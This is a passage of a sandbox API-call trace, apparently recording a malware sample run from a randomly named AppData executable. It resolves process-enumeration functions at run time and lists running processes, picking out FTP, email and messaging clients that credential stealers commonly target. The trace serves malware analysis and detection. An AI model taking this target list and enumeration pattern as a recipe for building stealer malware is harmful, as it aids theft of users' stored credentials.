HALPmcxz\\AppData\\Local\\ea2f22f9-d502-4d6e-b556-7aab02299e6c\\OnB5h0yX46mreVq4.exe\" --Task", pNumArgs=0x18de04 | out: pNumArgs=0x18de04) returned 0x361c0a0*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\ea2f22f9-d502-4d6e-b556-7aab02299e6c\\OnB5h0yX46mreVq4.exe" [0162.604] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\ea2f22f9-d502-4d6e-b556-7aab02299e6c\\OnB5h0yX46mreVq4.exe") returned="OnB5h0yX46mreVq4.exe" [0162.604] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76d30000 [0162.604] GetProcAddress (hModule=0x76d30000, lpProcName="EnumProcesses") returned 0x0 [0162.605] GetProcAddress (hModule=0x76d30000, lpProcName="EnumProcessModules") returned 0x0 [0162.605] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleBaseNameW") returned 0x0 [0162.605] LoadLibraryW (lpLibFileName="Psapi.dll") returned 0x77060000 [0162.606] GetProcAddress (hModule=0x77060000, lpProcName="EnumProcesses") returned 0x77061544 [0162.606] GetProcAddress (hModule=0x77060000, lpProcName="EnumProcessModules") returned 0x77061408 [0162.607] GetProcAddress (hModule=0x77060000, lpProcName="GetModuleBaseNameW") returned 0x7706152c [0162.607] EnumProcesses (in: lpidProcess=0x183600, cb=0xa000, lpcbNeeded=0x18de10 | out: lpidProcess=0x183600, lpcbNeeded=0x18de10) returned 1 [0162.612] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0162.612] CloseHandle (hObject=0x0) returned 0 [0162.612] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0162.612] CloseHandle (hObject=0x0) returned 0 [0162.612] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0162.612] CloseHandle (hObject=0x0) returned 0 [0162.612] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0162.612] CloseHandle (hObject=0x0) returned 0 [0162.612] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0162.612] CloseHandle (hObject=0x0) returned 0 [0162.612] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x184) returned 0x0 [0162.612] CloseHandle (hObject=0x0) returned 0 [0162.612] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1ac) returned 0x0 [0162.612] CloseHandle (hObject=0x0) returned 0 [0162.612] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0 [0162.612] CloseHandle (hObject=0x0) returned 0 [0162.612] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1e0) returned 0x0 [0162.612] CloseHandle (hObject=0x0) returned 0 [0162.612] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1e8) returned 0x0 [0162.612] CloseHandle (hObject=0x0) returned 0 [0162.612] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x250) returned 0x0 [0162.612] CloseHandle (hObject=0x0) returned 0 [0162.613] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x294) returned 0x0 [0162.613] CloseHandle (hObject=0x0) returned 0 [0162.613] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x2c8) returned 0x0 [0162.613] CloseHandle (hObject=0x0) returned 0 [0162.613] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x338) returned 0x0 [0162.613] CloseHandle (hObject=0x0) returned 0 [0162.613] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x370) returned 0x0 [0162.613] CloseHandle (hObject=0x0) returned 0 [0162.613] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x3ac) returned 0x0 [0162.613] CloseHandle (hObject=0x0) returned 0 [0162.613] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xc8) returned 0x0 [0162.613] CloseHandle (hObject=0x0) returned 0 [0162.613] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x11c) returned 0x0 [0162.613] CloseHandle (hObject=0x0) returned 0 [0162.613] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x444) returned 0x5b4 [0162.613] EnumProcessModules (in: hProcess=0x5b4, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 0 [0162.613] CloseHandle (hObject=0x5b4) returned 1 [0162.613] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x454) returned 0x5b4 [0162.614] EnumProcessModules (in: hProcess=0x5b4, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 0 [0162.614] CloseHandle (hObject=0x5b4) returned 1 [0162.614] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x47c) returned 0x0 [0162.614] CloseHandle (hObject=0x0) returned 0 [0162.614] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4bc) returned 0x0 [0162.614] CloseHandle (hObject=0x0) returned 0 [0162.614] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4c8) returned 0x5b4 [0162.614] EnumProcessModules (in: hProcess=0x5b4, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 0 [0162.614] CloseHandle (hObject=0x5b4) returned 1 [0162.614] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x588) returned 0x0 [0162.614] CloseHandle (hObject=0x0) returned 0 [0162.614] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x78c) returned 0x5b4 [0162.614] EnumProcessModules (in: hProcess=0x5b4, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0162.615] GetModuleBaseNameW (in: hProcess=0x5b4, hModule=0xd60000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="chi.exe") returned 0x7 [0162.615] CloseHandle (hObject=0x5b4) returned 1 [0162.616] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x60c) returned 0x5b4 [0162.616] EnumProcessModules (in: hProcess=0x5b4, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0162.617] GetModuleBaseNameW (in: hProcess=0x5b4, hModule=0x310000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="amp.exe") returned 0x7 [0162.617] CloseHandle (hObject=0x5b4) returned 1 [0162.617] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x20c) returned 0x5b4 [0162.617] EnumProcessModules (in: hProcess=0x5b4, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0162.618] GetModuleBaseNameW (in: hProcess=0x5b4, hModule=0xe10000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="sherman-nomination.exe") returned 0x16 [0162.618] CloseHandle (hObject=0x5b4) returned 1 [0162.618] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x240) returned 0x5b4 [0162.618] EnumProcessModules (in: hProcess=0x5b4, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0162.619] GetModuleBaseNameW (in: hProcess=0x5b4, hModule=0x8b0000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="checking_integration_majority.exe") returned 0x21 [0162.620] CloseHandle (hObject=0x5b4) returned 1 [0162.620] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x79c) returned 0x5b4 [0162.620] EnumProcessModules (in: hProcess=0x5b4, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0162.621] GetModuleBaseNameW (in: hProcess=0x5b4, hModule=0x250000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="frcarefultypical.exe") returned 0x14 [0162.621] CloseHandle (hObject=0x5b4) returned 1 [0162.621] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7c4) returned 0x5b4 [0162.621] EnumProcessModules (in: hProcess=0x5b4, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0162.622] GetModuleBaseNameW (in: hProcess=0x5b4, hModule=0x1170000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="ec_lessons.exe") returned 0xe [0162.622] CloseHandle (hObject=0x5b4) returned 1 [0162.622] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x798) returned 0x5b4 [0162.622] EnumProcessModules (in: hProcess=0x5b4, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0162.623] GetModuleBaseNameW (in: hProcess=0x5b4, hModule=0xa50000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="homeland-used.exe") returned 0x11 [0162.624] CloseHandle (hObject=0x5b4) returned 1 [0162.624] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x488) returned 0x5b4 [0162.624] EnumProcessModules (in: hProcess=0x5b4, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0162.625] GetModuleBaseNameW (in: hProcess=0x5b4, hModule=0xe60000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="shipped_hormone.exe") returned 0x13 [0162.625] CloseHandle (hObject=0x5b4) returned 1 [0162.625] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7d0) returned 0x5b4 [0162.625] EnumProcessModules (in: hProcess=0x5b4, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0162.626] GetModuleBaseNameW (in: hProcess=0x5b4, hModule=0xf0000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="cambridge knowing.exe") returned 0x15 [0162.627] CloseHandle (hObject=0x5b4) returned 1 [0162.627] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7a4) returned 0x5b4 [0162.627] EnumProcessModules (in: hProcess=0x5b4, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0162.628] GetModuleBaseNameW (in: hProcess=0x5b4, hModule=0x1390000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="maritime institutional.exe") returned 0x1a [0162.628] CloseHandle (hObject=0x5b4) returned 1 [0162.628] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x774) returned 0x5b4 [0162.628] EnumProcessModules (in: hProcess=0x5b4, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0162.629] GetModuleBaseNameW (in: hProcess=0x5b4, hModule=0x1f0000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="conditioning-surf-detection.exe") returned 0x1f [0162.629] CloseHandle (hObject=0x5b4) returned 1 [0162.630] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7f4) returned 0x5b4 [0162.630] EnumProcessModules (in: hProcess=0x5b4, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0162.630] GetModuleBaseNameW (in: hProcess=0x5b4, hModule=0xc90000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="muscles.exe") returned 0xb [0162.631] CloseHandle (hObject=0x5b4) returned 1 [0162.631] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7dc) returned 0x5b4 [0162.631] EnumProcessModules (in: hProcess=0x5b4, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0162.632] GetModuleBaseNameW (in: hProcess=0x5b4, hModule=0xc00000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="mark drugs.exe") returned 0xe [0162.632] CloseHandle (hObject=0x5b4) returned 1 [0162.632] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x48c) returned 0x5b4 [0162.632] EnumProcessModules (in: hProcess=0x5b4, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0162.633] GetModuleBaseNameW (in: hProcess=0x5b4, hModule=0xf10000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="anybody.exe") returned 0xb [0162.633] CloseHandle (hObject=0x5b4) returned 1 [0162.634] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x5cc) returned 0x5b4 [0162.634] EnumProcessModules (in: hProcess=0x5b4, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0162.635] GetModuleBaseNameW (in: hProcess=0x5b4, hModule=0xcf0000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="borders-connected.exe") returned 0x15 [0162.635] CloseHandle (hObject=0x5b4) returned 1 [0162.635] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x36c) returned 0x5b4 [0162.635] EnumProcessModules (in: hProcess=0x5b4, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0162.636] GetModuleBaseNameW (in: hProcess=0x5b4, hModule=0x1180000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="3dftp.exe") returned 0x9 [0162.636] CloseHandle (hObject=0x5b4) returned 1 [0162.636] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x318) returned 0x5b4 [0162.636] EnumProcessModules (in: hProcess=0x5b4, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0162.637] GetModuleBaseNameW (in: hProcess=0x5b4, hModule=0xa40000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="absolutetelnet.exe") returned 0x12 [0162.637] CloseHandle (hObject=0x5b4) returned 1 [0162.637] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x6c0) returned 0x5b4 [0162.637] EnumProcessModules (in: hProcess=0x5b4, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0162.638] GetModuleBaseNameW (in: hProcess=0x5b4, hModule=0xf20000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="alftp.exe") returned 0x9 [0162.639] CloseHandle (hObject=0x5b4) returned 1 [0162.639] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x664) returned 0x5b4 [0162.639] EnumProcessModules (in: hProcess=0x5b4, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0162.640] GetModuleBaseNameW (in: hProcess=0x5b4, hModule=0xab0000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="barca.exe") returned 0x9 [0162.640] CloseHandle (hObject=0x5b4) returned 1 [0162.640] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x6a8) returned 0x5b4 [0162.640] EnumProcessModules (in: hProcess=0x5b4, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0162.641] GetModuleBaseNameW (in: hProcess=0x5b4, hModule=0x120000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="bitkinex.exe") returned 0xc [0162.641] CloseHandle (hObject=0x5b4) returned 1 [0162.641] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x308) returned 0x5b4 [0162.641] EnumProcessModules (in: hProcess=0x5b4, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0162.642] GetModuleBaseNameW (in: hProcess=0x5b4, hModule=0xe20000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="coreftp.exe") returned 0xb [0162.642] CloseHandle (hObject=0x5b4) returned 1 [0162.643] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x25c) returned 0x5b4 [0162.643] EnumProcessModules (in: hProcess=0x5b4, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0162.644] GetModuleBaseNameW (in: hProcess=0x5b4, hModule=0xb10000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="far.exe") returned 0x7 [0162.644] CloseHandle (hObject=0x5b4) returned 1 [0162.644] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x598) returned 0x5b4 [0162.644] EnumProcessModules (in: hProcess=0x5b4, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0162.645] GetModuleBaseNameW (in: hProcess=0x5b4, hModule=0x160000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="filezilla.exe") returned 0xd [0162.645] CloseHandle (hObject=0x5b4) returned 1 [0162.645] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x35c) returned 0x5b4 [0162.645] EnumProcessModules (in: hProcess=0x5b4, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0162.646] GetModuleBaseNameW (in: hProcess=0x5b4, hModule=0x3e0000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="flashfxp.exe") returned 0xc [0162.646] CloseHandle (hObject=0x5b4) returned 1 [0162.646] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x434) returned 0x5b4 [0162.646] EnumProcessModules (in: hProcess=0x5b4, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0162.647] GetModuleBaseNameW (in: hProcess=0x5b4, hModule=0x800000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="fling.exe") returned 0x9 [0162.648] CloseHandle (hObject=0x5b4) returned 1 [0162.648] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x2c4) returned 0x5b4 [0162.648] EnumProcessModules (in: hProcess=0x5b4, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0162.649] GetModuleBaseNameW (in: hProcess=0x5b4, hModule=0xb50000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="foxmailincmail.exe") returned 0x12 [0162.649] CloseHandle (hObject=0x5b4) returned 1 [0162.649] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x5dc) returned 0x5b4 [0162.650] EnumProcessModules (in: hProcess=0x5b4, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0162.650] GetModuleBaseNameW (in: hProcess=0x5b4, hModule=0x11b0000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="gmailnotifierpro.exe") returned 0x14 [0162.651] CloseHandle (hObject=0x5b4) returned 1 [0162.651] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x3d4) returned 0x5b4 [0162.651] EnumProcessModules (in: hProcess=0x5b4, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0162.652] GetModuleBaseNameW (in: hProcess=0x5b4, hModule=0xa00000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="icq.exe") returned 0x7 [0162.652] CloseHandle (hObject=0x5b4) returned 1 [0162.652] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4e4) returned 0x5b4 [0162.652] EnumProcessModules (in: hProcess=0x5b4, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0162.653] GetModuleBaseNameW (in: hProcess=0x5b4, hModule=0xf10000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="leechftp.exe") returned 0xc [0162.653] CloseHandle (hObject=0x5b4) returned 1 [0162.653] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x6dc) returned 0x5b4 [0162.653] EnumProcessModules (in: hProcess=0x5b4, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0162.654] GetModuleBaseNameW (in: hProcess=0x5b4, hModule=0xaf0000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="ncftp.exe") returned 0x9 [0162.655] CloseHandle (hObject=0x5b4) returned 1 [0162.655] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7b4) returned 0x5b4 [0162.655] EnumProcessModules (in: hProcess=0x5b4, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0162.656] GetModuleBaseNameW (in: hProcess=0x5b4, hModule=0xeb0000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="notepad.exe") returned 0xb [0162.656] CloseHandle (hObject=0x5b4) returned 1 [0162.656] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x674) returned 0x5b4 [0162.656] EnumProcessModules (in: hProcess=0x5b4, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0162.657] GetModuleBaseNameW (in: hProcess=0x5b4, hModule=0xfb0000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="operamail.exe") returned 0xd [0162.658] CloseHandle (hObject=0x5b4) returned 1 [0162.658] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x418) returned 0x5b4 [0162.658] EnumProcessModules (in: hProcess=0x5b4, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0162.659] GetModuleBaseNameW (in: hProcess=0x5b4, hModule=0x3d0000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="outlook.exe") returned 0xb [0162.659] CloseHandle (hObject=0x5b4) returned 1 [0162.659] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x5c4) returned 0x5b4 [0162.659] EnumProcessModules (in: hProcess=0x5b4, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0162.660] GetModuleBaseNameW (in: hProcess=0x5b4, hModule=0xe60000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="pidgin.exe") returned 0xa [0162.660] CloseHandle (hObject=0x5b4) returned 1 [0162.660] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x80c) returned 0x5b4 [0162.660] EnumProcessModules (in: hProcess=0x5b4, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0162.661] GetModuleBaseNameW (in: hProcess=0x5b4, hModule=0x160000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="scriptftp.exe") returned 0xd [0162.662] CloseHandle (hObject=0x5b4) returned 1 [0162.662] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x81c) returned 0x5b4 [0162.662] EnumProcessModules (in: hProcess=0x5b4, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0162.663] GetModuleBaseNameW (in: hProcess=0x5b4, hModule=0x11e0000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="skype.exe") returned 0x9 [0162.663] CloseHandle (hObject=0x5b4) returned 1 [0162.663] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x82c) returned 0x5b4 [0162.663] EnumProcessModules (in: hProcess=0x5b4, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0162.664] GetModuleBaseNameW (in: hProcess=0x5b4, hModule=0xba0000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="smartftp.exe") returned 0xc [0162.664] CloseHandle (hObject=0x5b4) returned 1 [0162.664] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x83c) returned 0x5b4 [0162.664] EnumProcessModules (in: hProcess=0x5b4, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0162.665] GetModuleBaseNameW (in: hProcess=0x5b4, hModule=0x1280000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="thunderbird.exe") returned 0xf [0162.666] CloseHandle (hObject=0x5b4) returned 1 [0162.666] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x84c) returned 0x5b4 [0162.666] EnumProcessModules (in: hProcess=0x5b4, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0162.667] GetModuleBaseNameW (in: hProcess=0x5b4, hModule=0xf20000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="totalcmd.exe") returned 0xc [0162.667] CloseHandle (hObject=0x5b4) returned 1 [0162.667] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x85c) returned 0x5b4 [0162.667] EnumProcessModules (in: hProcess=0x5b4, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0162.668] GetModuleBaseNameW (in: hProcess=0x5b4, hModule=0x11c0000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="trillian.exe") returned 0xc [0162.668] CloseHandle (hObject=0x5b4) returned 1 [0162.668] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x86c) returned 0x5b4 [0162.668] EnumProcessModules (in: hProcess=0x5b4, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0162.669] GetModuleBaseNameW (in: hProcess=0x5b4, hModule=0x220000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="webdrive.exe") returned 0xc [0162.670] CloseHandle (hObject=0x5b4) returned 1 [0162.670] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x87c) returned 0x5b4 [0162.670] EnumProcessModules (in: hProcess=0x5b4, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0162.671] GetModuleBaseNameW (in: hProcess=0x5b4, hModule=0xe70000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="whatsapp.exe") returned 0xc [0162.671] CloseHandle (hObject=0x5b4) returned 1 [0162.671] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x88c) returned 0x5b4 [0162.671] EnumProcessModules (in: hProcess=0x5b4, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0162.672] GetModuleBaseNameW (in: hProcess=0x5b4, hModule=0x1020000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="winscp.exe") returned 0xa [0162.672] CloseHandle (hObject=0x5b4) returned 1 [0162.672] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x89c) returned 0x5b4 [0162.672] EnumProcessModules (in: hProcess=0x5b4, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0162.673] GetModuleBaseNameW (in: hProcess=0x5b4, hModule=0x220000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="yahoomessenger.exe") returned 0x12 [0162.674] CloseHandle (hObject=0x5b4) returned 1 [0162.674] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8ac) returned 0x5b4 